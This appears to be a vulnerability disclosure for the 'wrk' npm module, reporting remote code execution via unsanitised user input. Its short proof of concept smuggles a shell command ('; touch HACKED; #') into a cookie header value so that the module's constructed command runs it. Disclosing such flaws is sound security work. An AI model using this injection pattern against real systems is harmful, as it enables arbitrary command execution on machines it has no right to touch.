Code Injection in sidorares/node-wrk
Valid
Reported on
Apr 21st 2020
Description
The wrk
module is vulnerable against RCE
since a command is crafted using user inputs
not validated and then executed, leading to arbitrary command injection
POC
- Create the following PoC file:
// poc.js
var wrk = require('wrk');
wrk({ threads: 1, connections: ['s','aaa'], duration: '10s', printLatency: true, headers: { cookie: 'test \'; touch HACKED; #' }, url: 'http://localhost:3000/' }); //Error !! --> any problem
- Check there aren't files called
HACKED
- Execute the following commands in another terminal:
npm i wrk # Install affected module
node poc.js # Run the PoC
- Recheck the files: now
HACKED
has been created
Occurrences
to join this conversation